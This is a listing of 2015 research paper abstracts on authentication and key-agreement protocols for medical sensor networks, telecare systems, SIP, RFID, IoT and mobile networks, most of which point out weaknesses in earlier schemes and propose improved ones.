Showing papers on "Otway–Rees protocol published in 2015"

Robust anonymous authentication protocol for health-care applications using wireless medical sensor networks

Abstract: With the fast development of wireless communication technologies and semiconductor technologies, the wireless sensor network (WSN) has been widely used in many applications As an application of the WSN, the wireless medical sensor network (WMSN) could improve health-care quality and has become important in the modern medical system In the WMSN, physiological data are collected by sensors deployed in the patient's body and sent to health professionals' mobile devices through wireless communication Then health professionals could get the status of the patient anywhere and anytime The data collected by sensors are very sensitive and important The leakage of them could compromise the patient's privacy and their malicious modification could harm the patient's health Therefore, both security and privacy are two important issues in WMSNs Recently, Kumar et al proposed an efficient authentication protocol for health-care applications using WMSNs and claimed that it could withstand various attacks However, we find that their protocol is vulnerable to the off-line password guessing attack and the privileged insider attack We also point out that their protocol cannot provide user anonymity In this paper, we will propose a robust anonymous authentication protocol for health-care applications using WMSNs Compared with Kumar et al's protocol, the proposed protocol has strong security and computational efficiency Therefore, it is more suitable for health-care applications using WMSNs

A Secure Three-Factor User Authentication and Key Agreement Protocol for TMIS With User Anonymity

Abstract: Telecare medical information system (TMIS) makes an efficient and convenient connection between patient(s)/user(s) and doctor(s) over the insecure internet. Therefore, data security, privacy and user authentication are enormously important for accessing important medical data over insecure communication. Recently, many user authentication protocols for TMIS have been proposed in the literature and it has been observed that most of the protocols cannot achieve complete security requirements. In this paper, we have scrutinized two (Mishra et al., Xu et al.) remote user authentication protocols using smart card and explained that both the protocols are suffering against several security weaknesses. We have then presented three-factor user authentication and key agreement protocol usable for TMIS, which fix the security pitfalls of the above mentioned schemes. The informal cryptanalysis makes certain that the proposed protocol provides well security protection on the relevant security attacks. Furthermore, the simulator AVISPA tool confirms that the protocol is secure against active and passive attacks including replay and man-in-the-middle attacks. The security functionalities and performance comparison analysis confirm that our protocol not only provide strong protection on security attacks, but it also achieves better complexities along with efficient login and password change phase as well as session key verification property.

An improved authentication protocol for session initiation protocol using smart card

Abstract: The session initiation protocol (SIP) is the most widely used signaling protocol for controlling communication on the Internet, establishing, maintaining, and terminating the sessions. To get secure communication, many authentication protocols for SIP have been proposed. Very recently, Zhang et al. proposed a new authenticated key agreement protocol for SIP using smart card. They also show their protocol could withstand various attacks. However, in this paper, we point out that their protocol is vulnerable to the impersonation attack. We also propose an improved protocol to overcome the weakness. Security analysis shows that our protocol could overcome the weaknesses in Zhang et al.’s protocol. Performance analysis shows that the computational cost in the authentication phase of our protocol is about 75 % of Zhang et al.’s protocol.

Cryptanalysis and Improvement of an Improved Two Factor Authentication Protocol for Telecare Medical Information Systems

Abstract: Telecare medical information systems (TMIS) provides rapid and convenient health care services remotely. Efficient authentication is a prerequisite to guarantee the security and privacy of patients in TMIS. Authentication is used to verify the legality of the patients and TMIS server during remote access. Very recently Islam et al. (J. Med. Syst. 38(10):135, 2014) proposed a two factor authentication protocol for TMIS using elliptic curve cryptography (ECC) to improve Xu et al.'s (J. Med. Syst. 38(1):9994, 2014) protocol. They claimed their improved protocol to be efficient and provides all security requirements. However our analysis reveals that Islam et al.'s protocol suffers from user impersonation and server impersonation attacks. Furthermore we proposed an enhanced protocol. The proposed protocol while delivering all the virtues of Islam et al.'s protocol resists all known attacks.

Key Management Protocol with Implicit Certificates for IoT systems

Abstract: This paper proposes a Key Management Protocol for mobile and industrial Internet of Things systems, targeting, at the same time, robust key negotiation, lightweight node authentication, fast re-keying, and efficient protection against replay attacks. The proposed approach pragmatically leverages widely accepted Elliptic Curve Cryptography constructions, specifically the (Elliptic Curve) "Fixed" Diffie Hellman key exchange and the (Elliptic Curve) Qu-Vanstone implicit certificates. Our value added is their suitable integration into a security protocol exchange, designed at layer 2, in the 802.15.4 protocol stack, which permits to i) avoid Elliptic Point multiplications upon rekeying of previously paired devices, and ii) support mutual authentication while securing the protocol exchange. To prove its viability, the proposed Key Management Protocol has been implemented and assessed on severely constrained devices. As expected, but made explicit and quantified by our experimental performance evaluation, the usage of implicit certificates in conjunction with an optimized message exchange yields impressive gains in terms of airtime consumption with respect to state of the art schemes.

An Improved RSA Based User Authentication and Session Key Agreement Protocol Usable in TMIS

Abstract: Recently, Giri et al.'s proposed a RSA cryptosystem based remote user authentication scheme for telecare medical information system and claimed that the protocol is secure against all the relevant security attacks. However, we have scrutinized the Giri et al.'s protocol and pointed out that the protocol is not secure against off-line password guessing attack, privileged insider attack and also suffers from anonymity problem. Moreover, the extension of password guessing attack leads to more security weaknesses. Therefore, this protocol needs improvement in terms of security before implementing in real-life application. To fix the mentioned security pitfalls, this paper proposes an improved scheme over Giri et al.'s scheme, which preserves user anonymity property. We have then simulated the proposed protocol using widely-accepted AVISPA tool which ensures that the protocol is SAFE under OFMC and CL-AtSe models, that means the same protocol is secure against active and passive attacks including replay and man-in-the-middle attacks. The informal cryptanalysis has been also presented, which confirmed that the proposed protocol provides well security protection on the relevant security attacks. The performance analysis section compares the proposed protocol with other existing protocols in terms of security and it has been observed that the protocol provides more security and achieves additional functionalities such as user anonymity and session key verification.

A single round-trip SIP authentication scheme for Voice over Internet Protocol using smart card

Abstract: The Session Initiation Protocol (SIP) has revolutionized the way of controlling Voice over Internet Protocol (VoIP) based communication sessions over an open channel. The SIP protocol is insecure for being an open text-based protocol inherently. Different solutions have been presented in the last decade to secure the protocol. Recently, Zhang et al. authentication protocol has been proposed with a sound feature that authenticates the users without any password-verifier database using smart card. However, the scheme has a few limitations and can be made more secure and optimized regarding cost of exchanged messages, with a few modifications. Our proposed key-agreement protocol makes a use of two server secrets for robustness and is also capable of authenticating the involved parties in a single round-trip of exchanged messages. The server can now authenticate the user on the request message received, rather than the response received upon sending the challenge message, saving another round-trip of exchanged messages and hence escapes a possible denial of service attack.

Design and Analysis of Bilinear Pairing Based Mutual Authentication and Key Agreement Protocol Usable in Multi-server Environment

Abstract: With the increasing popularity and demand for various applications, the internet user accesses remote server by performing remote user authentication protocol using smart card over the insecure channel. In order to resist insider attack, most of the users remember a set of identity and password for accessing different application servers. Therefore, remembering set of identity and password is an extra overhead to the user. To avoid the mentioned shortcoming, many remote user authentication and key agreement protocols for multi-server architecture have been proposed in the literature. Recently, Hsieh---Leu proposed an improve protocol of Liao et al. scheme and claimed that the improve protocol is applicable for practical implementation. However, through careful analysis, we found that Hsieh---Leu scheme is still vulnerable to user anonymity, password guessing attack, server masquerading attack and the password change phase is inefficient. Therefore, the main aim of this paper was to design a bilinear pairing based three factors remote user authentication scheme using smart card for providing security weaknesses free protocol. In order to validate security proof of the proposed protocol, this paper uses BAN logic which ensures that the same protocol achieves mutual authentication and session key agreement property securely. Furthermore, this paper also informally illustrates that the proposed protocol is well protected against all the relevant security attacks. The performance analysis and comparison with other schemes are also made, and it has been found that the proposed protocol achieves complete security requirements with comparatively lesser complexities.

A Hash Based Mutual RFID Tag Authentication Protocol in Telecare Medicine Information System

Abstract: Radio Frequency Identification (RFID) is a technology which has multidimensional applications to reduce the complexity of today life. Everywhere, like access control, transportation, real-time inventory, asset management and automated payment systems etc., RFID has its enormous use. Recently, this technology is opening its wings in healthcare environments, where potential applications include patient monitoring, object traceability and drug administration systems etc. In this paper, we propose a secure RFID-based protocol for the medical sector. This protocol is based on hash operation with synchronized secret. The protocol is safe against active and passive attacks such as forgery, traceability, replay and de-synchronization attack.

A Secure and Efficient Communication Scheme with Authenticated Key Establishment Protocol for Road Networks

Abstract: The authentication protocols are trusted components in a communication system in order to protect sensitive information against a malicious adversary in the road network environment by means of providing a variety of services including users' privacy and authentication. Authenticated key agreement protocol is a useful cryptographic primitive, which can be used to protect the confidentiality, integrity and authenticity for transmitted data over insecure networks. From the point of view of the management of pre-shared secrets, one of the advantages of three-party authenticated key agreement protocols is that they are more suitable for use in a network with large numbers of users compared with two-party authenticated key agreement protocols. Using smart cards is a practical, secure measure to protect the secret private keys of a user. In this paper, we introduce an Authentication key establishment protocol for IPv6-based Road networks. In this architecture, a mobile vehicle obtains a unique address from a neighbor mobile vehicle or a road side unit without duplicate address detection, and the leaving mobile vehicle's address space can be automatically reclaimed for reassignment. If the next mobile vehicle located is in transmission range, then the mobile vehicle forwards the packets; if not, then it carries the packets until meeting. The carry mostly occurs on sparsely populated road segments; with long carry distances having long end-to-end packet delays. On the other hand, we also describe a new authentication method based on a cryptographic protocol including a zero-knowledge proof that each node must use to convince another node on the possession of certain secret without revealing anything about it, which allows encrypted communication during authentication. The proposed protocol featured with the following characteristics: Firstly, it offers anonymous authentication: a message issuer can authenticate itself. Secondly, it provides confidential: the secrecy of the communication content can be protected. The address configuration scheme must lower the cost in order to enhance the scalability. Thirdly, it is efficient: it achieves low storage requirements, fast message verification and cost-effective identity tracking in case of a dispute. In this paper, we evaluate the performance of this protocol. The data results show that protocol effectively improves the address configuration performance and our scheme is secure against passive and active attacks. Our scheme provides high security along with low computational and communication costs. As a result, our scheme is practically suitable for mobile devices in the road network environment as compared to other related schemes in the literature.

Handover authentication for mobile networks: security and efficiency aspects

Abstract: A handover authentication module in mobile networks enables mobile nodes to securely and seamlessly roam over multiple access points. However, designing an appropriate handover authentication protocol is a difficult task because wireless networks are susceptible to attacks, and mobile nodes have limited power and processing capability. In this article, we identify the security and efficiency requirements of a good handover authentication protocol and analyze the existing related protocols, and show that many such protocols are either insecure or inefficient. Then we review a recently proposed protocol named PairHand, which has been shown to outperform all other protocols on security and efficiency. Furthermore, we propose a novel protocol named HashHand that not only inherits the merits of Pair- Hand and efficiently eliminates its security vulnerabilities, but also provides a session key update mechanism. Experiments using our implementation on resource-limited laptop PCs show that HashHand is feasible for practical mobile networks.

Cryptanalysis of smart-card-based password authenticated key agreement protocol for session initiation protocol of Zhang et al.

Abstract: As the core signaling protocol for multimedia services, such as voice over internet protocol, the session initiation protocol SIP is receiving much attention and its security is becoming increasingly important. It is critical to develop a roust user authentication protocol for SIP. The original authentication protocol is not strong enough to provide acceptable security level, and a number of authentication protocols have been proposed to strengthen the security. Recently, Zhang et al. proposed an efficient and flexible smart-card-based password authenticated key agreement protocol for SIP. They claimed that the protocol enjoys many unique properties and can withstand various attacks. However, we demonstrate that the scheme by Zhang et al. is insecure against the malicious insider impersonation attack. Specifically, a malicious user can impersonate other users registered with the same server. We also proposed an effective fix to remedy the flaw, which remedies the security flaw without sacrificing the efficiency. The lesson learned is that the authenticators must be closely coupled with the identity, and we should prevent the identity from being separated from the authenticators in the future design of two-factor authentication protocols. Copyright © 2014 John Wiley & Sons, Ltd.

A Secure RFID Mutual Authentication Protocol for Healthcare Environments Using Elliptic Curve Cryptography

Abstract: Radio Frequency Identification(RFID) is an automatic identification technology, which can be widely used in healthcare environments to locate and track staff, equipment and patients. However, potential security and privacy problems in RFID system remain a challenge. In this paper, we design a mutual authentication protocol for RFID based on elliptic curve cryptography(ECC). We use pre-computing method within tag's communication, so that our protocol can get better efficiency. In terms of security, our protocol can achieve confidentiality, unforgeability, mutual authentication, tag's anonymity, availability and forward security. Our protocol also can overcome the weakness in the existing protocols. Therefore, our protocol is suitable for healthcare environments.

Design and Analysis of an Enhanced Patient-Server Mutual Authentication Protocol for Telecare Medical Information System

Abstract: In order to access remote medical server, generally the patients utilize smart card to login to the server. It has been observed that most of the user (patient) authentication protocols suffer from smart card stolen attack that means the attacker can mount several common attacks after extracting smart card information. Recently, Lu et al.'s proposes a session key agreement protocol between the patient and remote medical server and claims that the same protocol is secure against relevant security attacks. However, this paper presents several security attacks on Lu et al.'s protocol such as identity trace attack, new smart card issue attack, patient impersonation attack and medical server impersonation attack. In order to fix the mentioned security pitfalls including smart card stolen attack, this paper proposes an efficient remote mutual authentication protocol using smart card. We have then simulated the proposed protocol using widely-accepted AVISPA simulation tool whose results make certain that the same protocol is secure against active and passive attacks including replay and man-in-the-middle attacks. Moreover, the rigorous security analysis proves that the proposed protocol provides strong security protection on the relevant security attacks including smart card stolen attack. We compare the proposed scheme with several related schemes in terms of computation cost and communication cost as well as security functionalities. It has been observed that the proposed scheme is comparatively better than related existing schemes.

A group-based security protocol for machine-type communications in LTE-advanced

Abstract: Machine-type communication (MTC) takes advantage of millions of devices being connected to each other in sensing our environment. A third-generation partnership project has been actively considering MTC as an enabler for ubiquitous computing and context-aware services. Until recently, we have not yet known how to productively manage the signaling traffic from these MTC devices because authentication requirements may impose such large signaling loads that they overwhelm the radio access of 4G cellular networks. This paper proposes the design of an efficient security protocol for MTC. This protocol is designed to be compatible with the incumbent system by being composed of only symmetric cryptography. Efficiency is attained by aggregating many authentication requests into a single one. The security and performance of the new design are evaluated via formal verification and theoretical analysis. Implementation of the proposed protocol in a real LTE-A network is provided through a feasibility analysis undertaken to prove the practicability of the protocol. Based on these evaluations, we contend that the proposed protocol is practical in terms of security and performance for MTC in LTE-Advanced.

An Integrated Hierarchical Dynamic Quantum Secret Sharing Protocol

Abstract: Generalizing the notion of dynamic quantum secret sharing (DQSS), a simplified protocol for hierarchical dynamic quantum secret sharing (HDQSS) is proposed and it is shown that the protocol can be implemented using any existing protocol of quantum key distribution, quantum key agreement or secure direct quantum communication. The security of this proposed protocol against eavesdropping and collusion attacks is discussed with specific attention towards the issues related to the composability of the subprotocols that constitute the proposed protocol. The security and qubit efficiency of the proposed protocol is also compared with that of other existing protocols of DQSS. Further, it is shown that it is possible to design a semi-quantum protocol of HDQSS and in principle, the protocols of HDQSS can be implemented using any quantum state. It is also noted that the completely orthogonal-state-based realization of HDQSS protocol is possible and that HDQSS can be experimentally realized using a large number of alternative approaches.

Robustness of the round-robin differential-phase-shift quantum-key-distribution protocol against source flaws

Abstract: Recently, a new type of quantum key distribution, called the round-robin differential phase-shift (RRDPS) protocol [Nature 509, 475 (2014)], was proposed, where the security can be guaranteed without monitoring any statistics. In this Letter, we investigate source imperfections and side-channel attacks on the source of this protocol. We show that only three assumptions are needed for the security, and no detailed characterizations of the source or the side-channel attacks are needed. This high robustness is another striking advantage of the RRDPS protocol over other protocols.

A security authentication scheme in machine-to-machine home network service

Abstract: Machine-to-machine M2M techniques have significant application potential in the emerging internet of things, which may cover many fields from intelligence to ubiquitous environment. However, because of the data exposure when transmitted via cable, wireless mobile devices, and other technologies, its security vulnerability has become a great concern during its further extending development. This problem may even get worse if the user privacy and property are considered. Therefore, the authentication process of communicating entities has attracted wide investigation. Meanwhile, the data confidentiality also becomes an important issue in M2M, especially when the data are transmitted in a public and thereby insecure channel. In this paper, we propose a promising M2M application model that connects a mobile user with the home network using the existing popular Time Division-Synchronous Code Division Multiple Access TD-SCDMA network. Subsequently, a password-based authentication and key establishment protocol is designed to identify the communicating parties and hence establish a secure channel for data transmissions. The final analysis shows the reliability of our proposed protocol. Copyright © 2012 John Wiley & Sons, Ltd.

Security Analysis and Improvement on Two RFID Authentication Protocols

Abstract: Several lightweight RFID authentication protocols have been proposed to settle the security and privacy problems. Nevertheless, most of these protocols are analyzed and they are not successful in their attempt to achieve the claimed security objectives. In this paper, we consider the security of two recently proposed typical RFID authentication protocols: RAPLT protocol and SRP+ protocol. RAPLT protocol is a new ultra-lightweight RFID protocol based on two new operations named $$merge$$merge and $$separation$$separation. Utilizing the linear property of the $$merge$$merge operation, we present a passive disclosure attack on RAPLT protocol, and we can deduce the shared secrets with overwhelming probability after eavesdropping about 100 round authentication sessions. SRP+ protocol is a novel secure RFID authentication protocol conforming to the EPC C-1 G-2 standard, and we present efficient de-synchronization attack and passive disclosure attack through exhaustive search. Our disclosure attack only needs one run of the protocol, and the attack complexity is $$O(2^{16})$$O(216) evaluation of the PRNG function in off-line analysis mode. In addition, to counteract the vulnerabilities, we propose a new modified version of SRP+ protocol, denoted by $$ SRP ^{++}$$SRP++, conforming to the EPC C-1 G-2 standard. Our security analysis demonstrates that $$ SRP ^{++}$$SRP++ protocol can resist the exhaustive search attack with the complexity $$O(2^{32})$$O(232), which is the optimal security bound.

Automatic protocol field inference for deeper protocol understanding

Abstract: Security tools have evolved dramatically in the recent years to combat the increasingly complex nature of attacks, but to be effective these tools need to be configured by experts that understand network protocols thoroughly. In this paper we present FieldHunter, which automatically extracts fields and infers their types; providing this much needed information to the security experts for keeping pace with the increasing rate of new network applications and their underlying protocols. FieldHunter relies on collecting application messages from multiple sessions and then applying statistical correlations is able to infer the types of the fields. These statistical correlations can be between different messages or other associations with meta-data such as message length, client or server IPs. Our system is designed to extract and infer fields from both binary and textual protocols. We evaluated FieldHunter on real network traffic collected in ISP networks from three different continents. FieldHunter was able to extract security relevant fields and infer their nature for well documented network protocols (such as DNS and MSNP) as well as protocols for which the specifications are not publicly available (such as SopCast) and from malware such as (Ramnit).

Cryptanalysis and Design of a Three-Party Authenticated Key Exchange Protocol Using Smart Card

Abstract: Three-party authenticated key exchange protocol (3PAKE) is used to provide security protection on the transmitted data over the insecure communication by performing session key agreement between the entities involved. Comparing with the 2PAKE protocol, 3PAKE protocol is more suitable for managing unrestricted number of users. Recently, several researchers have proposed many 3PAKE protocols using smart card. However, we have scrutinized carefully recently published Yang et al.’s protocol, and it has been observed that the same protocol suffers from several security weaknesses such as insider attack, off-line password guessing attack, many logged-in users’ attack and replay attack. Moreover, we have justified a serious security issue of the password change phase of the same scheme. In order to fix the above-mentioned shortcomings, this paper proposes an efficient 3PAKE protocol using smart card based on the cryptographic one-way hash function. The formal security analysis proves that proposed protocol provides strong security protection on the relevant security attacks including the above-mentioned security weaknesses. Moreover, the simulation results of the proposed scheme using AVISPA tool show that the same protocol is SAFE under OFMC and CL-AtSe models. The performance comparisons are also made, which ensure that the protocol is relatively better than the existing related schemes. To the best of our knowledge, the proposed scheme should be implemented in practical application, as it provides well security protection on the relevant security attacks, provides relatively better complexities than the existing schemes, achieves proper mutual authentication along with user-friendly password change phase.

A chaotic map-based anonymous multi-server authenticated key agreement protocol using smart card

Abstract: Authenticated key agreement protocols play an important role for network-connected servers to authenticate remote users in Internet environment. In recent years, several authenticated key agreement protocols for single-server environment have been developed based on chaotic maps. In modern societies, people usually have to access multiple websites or enterprise servers to accomplish their daily personal matters or duties on work; therefore, how to increase user's convenience by offering multi-server authentication protocol becomes a practical research topic. In this study, a novel chaotic map-based anonymous multi-server authenticated key agreement protocol using smart card is proposed. In this protocol, a legal user can access multiple servers using only a single secret key obtained from a trusted third party, known as the registration center. Security analysis shows this protocol is secure against well-known attacks. In addition, protocol efficiency analysis is conducted by comparing the proposed protocol with two recently proposed schemes in terms of computational cost during one authentication session. We have shown that the proposed protocol is twice faster than the one proposed by Khan and He while preserving the same security properties as their protocol has. Copyright © 2014 John Wiley & Sons, Ltd.

Provably Secure and Anonymous Password Authentication Protocol for Roaming Service in Global Mobility Networks Using Extended Chaotic Maps

Abstract: In recent years, many anonymous password-based mobile user authentication techniques have been constructed for roaming service in global mobility networks. However, such type of protocol has not yet been devised in the random oracle model using extended chaotic map. Therefore, in this paper, we put forwarded a new provably secure and privacy-preserving password authentication protocol using extended chaotic maps for roaming service in wireless networks. The proposed protocol is provably secure and protects active and passive attacks under the chaotic maps-based Diffie-Hellman (CDH) assumption in the random oracle model. The proposed protocol is also analyzed and compared with the related protocol. The results proved that it is strong enough to resist different security vulnerabilities and efficient against the existing protocol.

A new handover authentication protocol based on bilinear pairing functions for wireless networks

Abstract: Seamless handover over multiple access points is highly desirable to mobile nodes, but ensuring security and efficiency of this process is challenging. Many such protocols have been proposed but most of them are either insecure or inefficient. Very recently, He et al. proposed an improved protocol to overcome the weakness of a novel handover authentication protocol, namely PairHand. Later, they pointed out that their protocol is vulnerable to a private key compromised problem under certain circumstances and proposed an improved protocol to overcome the weakness. In this paper, we examine the security of He et al.'s improved protocol and show it is vulnerable to a private key compromised problem. To improve security, we propose a new ID-based signature protocol and construct a new handover authentication protocol based on the proposed signature protocol.

Leveraging State Information for Automated Attack Discovery in Transport Protocol Implementations

Abstract: We present a new method for finding attacks in unmodified transport protocol implementations using the specification of the protocol state machine to reduce the search space of possible attacks. Such reduction is obtained by appling malicious actions to all packets of the same type observed in the same state instead of applying them to individual packets. Our method requires knowledge of the packet formats and protocol state machine. We demonstrate our approach by developing SNAKE, a tool that automatically finds performance and resource exhaustion attacks on unmodified transport protocol implementations. SNAKE utilizes virtualization to run unmodified implementations in their intended environments and network emulation to create the network topology. SNAKE was able to find 9 attacks on 2 transport protocols, 5 of which we believe to be unknown in the literature.

Security analysis and improvement of two authentication and key agreement schemes for session initiation protocol

Abstract: Authentication is an important security requirement for session initiation protocol (SIP). The conventional authentication method for SIP is HTTP Digest authentication which is insecure against several security attacks. Hence, several authentication schemes have been proposed for SIP. Most recently, Jiang et al. and Yeh et al. proposed two separate authentication and key agreement schemes for SIP using smart cards. The present paper shows that Jiang et al.'s scheme is vulnerable to user impersonation attacks and Yeh et al.'s scheme is insecure against offline password guessing attacks and does not provide perfect forward secrecy. Furthermore, in order to overcome the mentioned drawbacks, this paper proposes a new two-factor authentication and key agreement scheme for SIP. Security and performance analyses show that the proposed scheme not only enhances the security, but also improves the efficiency.

Improvement of a chaotic maps-based three-party password-authenticated key exchange protocol without using server’s public key and smart card

Abstract: Three-party password-authenticated key exchange (3PAKE) protocol allows two users to establish a secure session key over an insecure communication channel with the help of a trusted server. Recently, Farash and Attari proposed a chaotic maps-based 3PAKE protocol without using server’s public key, smart card and symmetric cryptosystems and claimed its security by providing well-organized security proof. Unfortunately, in this paper, we demonstrate that their protocol cannot resist impersonation attack and off-line password guessing attack. To overcome their security weaknesses, we propose an improved chaotic maps-based 3PAKE protocol with the same advantages. Further, we apply the pi calculus-based formal verification tool ProVerif to show that our 3PAKE protocol achieves authentication and security and show that our protocol is more efficient than Farash and Attari’s protocol in terms of computation and communication costs.

A Secure Dynamic Identity Based Authentication Protocol with Smart Cards for Multi-Server Architecture

Abstract: Due to the rapid growth of computer networks and service providing servers, many network environments have been becoming multi-server architecture and various multi-server authentication protocols have been proposed. In such an environment, a user can obtain different network services from multiple network servers without repeating registration to each server. Recently, Li et al. proposed a secure dynamic ID based authentication protocol for multi-server architecture using smart cards. They claimed that their protocol preserves mutual authentication and protected from several attacks. However, in this paper, we find that Li et al.'s protocol cannot provide the protection against leak-of-verifier attack, impersonation attack, session key disclosure attack and many logged-in users' attack. To remedy these security flaws, we propose an improved version of dynamic ID based authentication protocol, which covers all the identified weaknesses of Li et al.'s protocol and is more secure and efficient for practical multi-server environments.